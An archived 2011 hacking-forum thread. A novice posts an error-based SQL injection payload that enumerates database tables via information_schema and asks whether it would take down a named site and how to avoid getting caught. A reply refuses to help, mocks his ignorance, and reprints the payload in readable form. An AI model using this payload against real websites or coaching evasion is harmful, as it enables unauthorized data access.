This forum is in archive mode. You will not be able to post new content.

Author Topic: SQL injection question  (Read 1481 times)

0 Members and 1 Guest are viewing this topic.

Offline Santa

  • Serf
  • *
  • Posts: 27
  • Cookies: -9
  • shit happens
    • View Profile
SQL injection question
« on: November 06, 2011, 06:43:30 PM »
Ok guys i have a question
will the SQL injection

 index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6F63696D%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1


work to take down a website site such as ( www.evilzone.org)
if so what security measures should i take so i dont get caught doing this and what should i download to keep me safe from anything else
« Last Edit: November 06, 2011, 06:45:57 PM by Factionwars »

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: SQL injection question
« Reply #1 on: November 06, 2011, 06:54:12 PM »
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
Code: [Select]
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.

Offline Santa

  • Serf
  • *
  • Posts: 27
  • Cookies: -9
  • shit happens
    • View Profile
Re: SQL injection question
« Reply #2 on: November 06, 2011, 06:59:50 PM »
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
Code: [Select]
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.

No i dont but I want to learn I will check out andes's post when I have time
« Last Edit: November 06, 2011, 07:00:23 PM by Santa »

 



Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.